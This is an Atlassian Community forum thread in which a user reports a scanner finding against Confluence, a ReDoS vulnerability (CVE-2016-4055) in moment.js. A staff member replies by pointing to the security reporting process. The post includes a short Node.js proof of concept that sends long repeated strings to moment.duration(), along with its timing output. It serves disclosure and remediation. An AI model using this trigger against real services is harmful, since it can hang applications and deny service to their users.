Create
cancel
Turn on suggestions
Auto-suggest helps you quickly narrow down your search results by suggesting possible matches as you type.
Showing results for 
Search instead for 
Did you mean: 
Sign up Log in
Products
See all
Community resources
Top groups
Explore all groups
Community resources
Learn
Community resources
Events
Community resources

Confluence Security Weakness Sonatype CWE: 400

Dillip Das
Dillip Das August 21, 2017

Hi,

Our security team performed a security scan on Confluence 6.21 and found a security issue and the detials are provided below. We could only adopt for production use, if that risk is addressed by Atlassian. Our procurement department is waiting for us to obtain a mitigating solution for this issue, before they procure Confluence. 

 

Severity Sonatype CVSS 3.0: 7.5

Weakness Sonatype CWE: 400

Explanation The moment package is vulnerable to a Regular Expression Denial of Service (ReDoS). The moment.duration() method in moment.js contains a regular expression, used to determine if an input is of the ASP.NET date format, that can cause an application to hang. The aspNetRegex, the variable's name in the code, causes very slow processing of exponentially long repetitive sequences leading to a Denial of Service (DoS) due to excessive resource consumption. A remote attacker could exploit this flaw by supplying a specially crafted request URL containing long repetitive sequences to cause the denial of service (DoS). "

Proof of concept:

var moment = require('moment');  

var genstr = function (len, chr) {      var result = "";     

for (i=0; i<=len; i++) {          result = result + chr;      }        return result; }     for (i=20000;i<=10000000;i=i+10000) {      console.log("COUNT: " + i);     

var str = '-' + genstr(i, '1')      console.log("LENGTH: " + str.length);      var start = process.hrtime();      moment.duration(str)        var end = process.hrtime(start);      console.log(end); }      

Results $ node moment.js COUNT: 20000 LENGTH: 20002 [ 0, 618931029 ] COUNT: 30001 LENGTH: 30003 [ 1, 401413894 ] COUNT: 40002 LENGTH: 40004 [ 2, 437075303 ] COUNT: 50003 LENGTH: 50005 [ 3, 824664804 ] COUNT: 60004 LENGTH: 60006 [ 5, 651335262 ] "

Reference Link: https://nodesecurity.io/advisories/55 Note: CVE-2016-4055 has been assigned to this vulnerability. Detection The application is vulnerable by using this package. Recommendation We recommend upgrading to a version of this component that is not vulnerable to this specific issue. Categories Data

Root Cause moment : 2.5.0

Advisories Project: https://nodesecurity.io/advisories/55  

Answer
Watch
Like Be the first to like this
502 views

1 answer

0 votes
AnnWorley
AnnWorley
Atlassian Team
Atlassian Team members are employees working across the company in a wide variety of roles.
August 21, 2017

Our security team has asked me to direct you to How to Report a Security Issue.

It would be great if you could follow up on this forum to let the Community know the result.

Reply

Suggest an answer

Log in or Sign up to answer
Confluence
Confluence
TAGS
AUG Leaders

Atlassian Community Events

    See all events